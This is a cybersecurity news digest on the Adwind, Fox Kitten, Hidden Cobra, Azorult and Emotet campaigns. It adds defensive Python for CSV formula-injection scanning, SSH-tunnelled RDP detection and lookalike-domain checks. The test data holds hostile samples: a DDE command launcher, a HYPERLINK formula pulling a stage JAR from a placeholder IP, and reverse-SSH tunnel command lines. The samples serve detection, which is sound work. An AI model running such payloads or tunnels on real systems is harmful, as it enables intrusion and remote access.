At a glance.
- Adwind hits companies in Turkey.
- Fox Kitten cyber campaign linked to Iran.
- FBI, CISA, US Cyber Command describe Hidden Cobra tools.
- Azorult Trojan misrepresents itself as a ProtonVPN installer.
- Emotet's sextortion spam earns far more than Necurs's did.
- Coronavirus as phishbait.
Adwind campaign is targeting Turkish companies.
Check Point is tracking an "evolving, ongoing malspam campaign that is targeting more than 80 Turkish companies." The malware is distributed via phishing emails carrying either XLS attachments in the deprecated BIFF5 binary format or CSV attachments (CSV is plain text, so only the XLS files use BIFF5). The XLS files use an ExternSheet injection to download a heavily obfuscated JAR file, while the CSV files use spreadsheet formula injection to download the same JAR. That JAR in turn fetches the Adwind remote access Trojan from a GitHub repository.
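The CSV half of that delivery chain rests on a simple fact: a field that begins with =, +, -, @ or a tab/carriage return is evaluated as a formula the moment a spreadsheet opens the file, and Excel's DDE syntax (=cmd|'/C ...'!A0) or a HYPERLINK/WEBSERVICE call is enough to pull a second stage. The following Python is an added example, not Check Point's code or the campaign's payload: it scans a CSV for fields that would execute and neutralises them with the leading apostrophe that forces text interpretation. The sample CSV, the staging URL and the list of "remote" functions are constructed for the illustration.

```python
import csv
import io
import re

# A field that starts with one of these (leading spaces allowed) is treated as a
# formula, not text, when the CSV is opened in Excel or LibreOffice.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Excel DDE syntax: =<application>|<command>!<item>, e.g. =cmd|'/C calc'!A0
DDE_PATTERN = re.compile(r"^\s*[=+\-@]\s*\w+\s*\|.*!")

# Functions that fetch remote content or hand off to another program. The list is
# constructed for this example; it is not taken from the Check Point analysis.
REMOTE_FUNCS = re.compile(
    r"\b(HYPERLINK|WEBSERVICE|IMPORTXML|IMPORTDATA|IMPORTHTML|DDE|EXEC)\s*\(", re.I
)


def classify_cell(value: str) -> str:
    """Return 'ok', 'formula', 'remote' or 'dde' for one CSV field."""
    stripped = value.lstrip(" ")
    if not stripped.startswith(FORMULA_TRIGGERS):
        return "ok"
    # "-12.50" or "+3" is a signed number, not a formula; don't flag it.
    try:
        float(stripped)
        return "ok"
    except ValueError:
        pass
    if DDE_PATTERN.match(stripped):
        return "dde"
    if REMOTE_FUNCS.search(stripped):
        return "remote"
    return "formula"  # e.g. @SUM(...) or a phone number such as +44 ... (a known false positive)


def neutralize_cell(value: str) -> str:
    """Prefix a single quote so the spreadsheet stores the field as literal text."""
    return value if classify_cell(value) == "ok" else "'" + value


def scan_csv(text: str) -> list:
    """List (row, column, verdict, field) for every field that would be evaluated."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, field in enumerate(row):
            verdict = classify_cell(field)
            if verdict != "ok":
                findings.append((r, c, verdict, field))
    return findings


def sanitize_csv(text: str) -> str:
    """Rewrite the CSV with every formula-looking field neutralised."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    for row in csv.reader(io.StringIO(text)):
        writer.writerow([neutralize_cell(field) for field in row])
    return out.getvalue()


# Constructed sample: one DDE launcher, one remote fetch, one plain formula,
# and a negative amount that must not be flagged.
SAMPLE_CSV = (
    "invoice,amount,note\n"
    "INV-1001,-12.50,\"=cmd|'/C calc'!A0\"\n"
    "INV-1002,40.00,\"=HYPERLINK(\"\"http://203.0.113.5/stage.jar\"\",\"\"open\"\")\"\n"
    "INV-1003,7.25,@SUM(B2:B3)\n"
)

if __name__ == "__main__":
    for finding in scan_csv(SAMPLE_CSV):
        print("row %d col %d [%s] %r" % finding)
    print(sanitize_csv(SAMPLE_CSV))
```

The signed-number exception is what keeps this usable on real invoices; the price is that values such as international phone numbers beginning with + are still flagged, so treat the "formula" verdict as a review queue and the "dde" and "remote" verdicts as the ones to block outright.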
Once installed, the malware performs a series of checks to ensure that the infected machine's location, language settings, and public IP address indicate that the user is Turkish. If the machine fails any of these checks, the malware stops executing. Analysts should keep this geofencing in mind: a sample detonated in a sandbox that does not present a Turkish locale and IP address will appear to do nothing.
The researchers note that Cisco Talos and ReversingLabs first spotted this campaign in September 2018, and Sophos described it in July 2019. Check Point observes that the threat actors seem to be improving and adapting their techniques to remain undetected. Despite the length of the campaign, their activity is still flying largely under the radar. Check Point and Sophos point out that these specific types of ExternSheet injection and spreadsheet formula injection are well-known but relatively uncommon techniques, which is one of the reasons why the malware has such a low detection rate.
It's not clear who's behind the campaign or what they're after. Sophos says the attackers' decent grasp of the Turkish language, along with the fact that early test samples of the malware were uploaded from Turkey, "lends credibility to the hypothesis that both the origin and targets of this campaign are in Turkey," but this evidence is circumstantial and doesn't hint at their motives.
APTs 34, 33, and 39 suspected in Fox Kitten attacks.
ClearSky researchers have discovered a large espionage campaign which they attribute to Iranian APTs, particularly APT34 (OilRig) with possible participation from APT33 (Elfin) and APT39 (Chafer). ClearSky calls the operation "Fox Kitten," and says it represents one of "Iran's most continuous and comprehensive campaigns." The researchers say this campaign is tied to the group tracked by Dragos as "PARISITE," which in turn is linked to MAGNALLIUM (although Dragos, as a rule, doesn't attribute activity groups to governments). ClearSky believes the campaign displays extensive collaboration between APT34 and APT33, to the point where the two groups could possibly be considered one.
Fox Kitten focuses on organizations in the IT, oil and gas, electricity, aviation, government, and security sectors. The targeted organizations to date have been located in Israel, the US, Saudi Arabia, Lebanon, Kuwait, the United Arab Emirates, Australia, France, Poland, Germany, Finland, Hungary, Italy, and Austria. The goal of the operation appears to be intelligence gathering and supply chain compromise.
The threat actors primarily exploit vulnerabilities in various VPN products to gain initial access to their targets. The researchers say the group is skilled at developing working exploits shortly after these vulnerabilities are publicly disclosed, which puts a premium on patching internet-facing VPN gateways promptly. After gaining access, the attackers establish persistence "by opening a variety of communication tools, including opening RDP links over SSH tunneling." They then begin seeking out and exfiltrating sensitive data.
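RDP wrapped in an SSH tunnel hides the 3389 traffic from network sensors, but the tunnel itself has to be set up on a host, and the forwarding specification lands in the process command line. The following Python is an added example, not ClearSky's or Dragos's tooling: it walks a list of process command lines and flags SSH-style clients whose -L, -R or -D forwarding spec carries TCP/3389. Treating plink as an SSH client is an assumption made for this example, and the process list is constructed.

```python
import re
from typing import List, Optional, Tuple

RDP_PORT = "3389"

# Clients that can wrap an arbitrary TCP port in an SSH session. Including plink
# is an assumption for this example; the report quoted above does not name tools.
SSH_CLIENTS = {"ssh", "ssh.exe", "plink", "plink.exe"}

# An option cluster ending in L, R or D (-R, -NR, -fNL ...), with the forwarding
# spec either attached ("-R3389:...") or in the following token.
FORWARD_FLAG = re.compile(r"^-[A-Za-z]*?([LRD])(.*)$")


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def forwards_rdp(cmdline: str) -> Optional[str]:
    """Describe the RDP forwarding in an SSH command line, or return None."""
    tokens = cmdline.split()  # constructed samples contain no quoted spaces
    if not tokens or _basename(tokens[0]) not in SSH_CLIENTS:
        return None
    i = 1
    while i < len(tokens):
        m = FORWARD_FLAG.match(tokens[i])
        if m:
            flag, spec = m.groups()
            if not spec and i + 1 < len(tokens):
                i += 1
                spec = tokens[i]
            # -L/-R specs look like [bind:]port:host:hostport, -D like [bind:]port;
            # any field equal to 3389 is enough to raise the alert.
            if RDP_PORT in spec.split(":"):
                return "%s forwards TCP/%s with -%s (%s)" % (
                    _basename(tokens[0]), RDP_PORT, flag, spec)
        i += 1
    return None


def scan_processes(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Return (command line, reason) for every process that tunnels RDP over SSH."""
    hits = []
    for cmdline in cmdlines:
        reason = forwards_rdp(cmdline)
        if reason:
            hits.append((cmdline, reason))
    return hits


# Constructed process list: three tunnels carrying 3389, one ordinary port forward
# to a web server, and a normal RDP client that must not be flagged.
SAMPLE_PROCESSES = [
    "ssh -N -R 3389:127.0.0.1:3389 ops@203.0.113.7",
    "plink.exe -ssh -N -R 203.0.113.7:3389:127.0.0.1:3389 -pw hunter2 ops@203.0.113.7",
    "ssh -L 8080:intranet:80 dev@bastion.example",
    "ssh -NR 3389:localhost:3389 -p 443 ops@203.0.113.7",
    "C:\\Windows\\System32\\mstsc.exe /v:fileserver",
]

if __name__ == "__main__":
    for cmdline, reason in scan_processes(SAMPLE_PROCESSES):
        print(reason, "<-", cmdline)
```

The check is deliberately narrow: an operator who forwards a different local port to the RDP service, or who tunnels through something other than an SSH client, will not trip it. Pair it with host telemetry on unexpected outbound SSH from servers and with alerts on RDP logons whose source address is the loopback interface, which is what a reverse tunnel produces.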
US government discloses North Korean malware.
US Cyber Command on Friday released six new malware samples used by the North Korea-aligned threat group Hidden Cobra. The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) simultaneously published Malware Analysis Reports on each new sample (ARTFULPIE, BISTROMATH, BUFFETLINE, CROWDEDFLOUNDER, HOTCROISSANT, and SLICKSHOES) along with a report on a seventh sample (HOPLIGHT) that was previously disclosed by the DHS and the FBI.
Azorult masquerades as ProtonVPN installer.
Kaspersky warns that the Azorult commodity Trojan is being distributed via phony ProtonVPN installers for Windows. The attackers registered a domain called "protonvpn[.]store" and used the HTTrack website copier to make a duplicate of ProtonVPN's legitimate site.
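Two cheap checks would have flagged the site described above before anyone ran the installer: the brand name sitting on the wrong TLD, and the comments HTTrack writes into every page it mirrors ("Mirrored from ... by HTTrack Website Copier" and "Added by HTTrack"). The following Python is an added example, not Kaspersky's or ProtonVPN's code: it classifies a hostname against a brand and checks fetched HTML for HTTrack's markers. The legitimate-domain set, the homoglyph table and the cloned page body are constructed for the illustration.

```python
import re
from typing import Optional

BRAND = "protonvpn"
LEGIT_DOMAINS = {"protonvpn.com"}  # assumed here as the vendor's genuine domain

# Character swaps common in lookalike registrations (constructed list).
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]

# HTTrack writes these into every page it mirrors unless the operator strips them.
MIRROR_COMMENT = re.compile(r"<!--\s*Mirrored from\s+(\S+)\s+by HTTrack Website Copier", re.I)
ADDED_BY_HTTRACK = re.compile(r"<!--\s*Added by HTTrack\s*-->", re.I)


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname (ignores multi-part suffixes such as co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def normalize(label: str) -> str:
    for fake, real in HOMOGLYPHS:
        label = label.replace(fake, real)
    return label


def lookalike_verdict(host: str) -> Optional[str]:
    """Explain why host resembles the brand, 'legitimate' if it is, None if unrelated."""
    domain = registrable_domain(host)
    if domain in LEGIT_DOMAINS:
        return "legitimate"
    label = domain.split(".")[0]
    if label == BRAND:
        return "brand label on unexpected TLD"
    if normalize(label) == normalize(BRAND):
        return "homoglyph of brand"
    if BRAND in label:
        return "brand embedded in label"
    return None


def httrack_mirror_of(html: str) -> Optional[str]:
    """Origin recorded by HTTrack's mirror comment, a marker-only note, or None."""
    m = MIRROR_COMMENT.search(html)
    if m:
        return m.group(1).rstrip("/")
    if ADDED_BY_HTTRACK.search(html):
        return "unknown (HTTrack markers present, origin comment removed)"
    return None


def assess(host: str, html: str) -> dict:
    return {
        "host": host,
        "domain_verdict": lookalike_verdict(host),
        "mirrored_from": httrack_mirror_of(html),
    }


# Constructed page: the markers follow HTTrack's real format, but the page body,
# the installer name and the timestamp are invented for this example.
CLONED_PAGE = """<!DOCTYPE html>
<!-- Mirrored from protonvpn.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 10 Feb 2020 09:00:00 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<html><head><title>ProtonVPN - Download</title></head>
<body><a href="ProtonVPN-setup.exe">Download for Windows</a></body></html>
"""

if __name__ == "__main__":
    for host in ("protonvpn.store", "www.protonvpn.com", "pr0tonvpn.net", "protonvpn-download.xyz"):
        print(host, "->", lookalike_verdict(host))
    print(assess("protonvpn.store", CLONED_PAGE))
```

The HTTrack comments are trivially deleted by an attacker who knows to look, so their absence proves nothing; their presence on a page offering a download is a strong, nearly free indicator. The domain check uses a naive two-label split and should be backed by a public-suffix list before it is pointed at real traffic.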
Azorult in this case is configured to "steal cryptocurrency from locally available wallets (Electrum, Bitcoin, Ethereum, etc.), FTP logins and passwords from FileZilla, email credentials, information from locally installed browsers (including cookies), credentials for WinSCP, Pidgin messenger and others."
ProtonVPN itself also says it's seen an increase in the number of malicious Android apps posing as the ProtonVPN app in the Google Play Store. The company stresses that "ProtonVPN apps are only available on the App Store, the Play Store, or on the ProtonVPN website," noting that users should make sure they're downloading the legitimate app even when they're using an official app store.
Emotet is much more effective than Necurs at sextortion.
Researchers at IBM X-Force have found that sextortion spam emails sent by Emotet's botnet have been generating ten times more money than similar sextortion emails sent by the Necurs botnet. The researchers attribute this to Emotet's targeting of victims' workplace email addresses, which puts greater pressure on the victims to resolve the matter quickly and quietly. Additionally, Emotet's emails demand payment in Bitcoin, while Necurs's asked for Dashcoin (which has a much lower value than Bitcoin).
Coronavirus used as phishbait.
Cisco Talos summarizes the ongoing wave of coronavirus-themed phishing campaigns. While attackers capitalizing on current events is nothing new or unexpected, Talos believes it's worth spreading the word about these particular scams. The coronavirus is both well-known and feared globally, which gives attackers excellent bait for widespread phishing campaigns. Talos has observed campaigns distributing Trojans including Emotet, Parallax, and Nanocore, as well as wipers, adware, and "a lot of weird executables and other files floating around," all of which use phishing lures that reference the virus.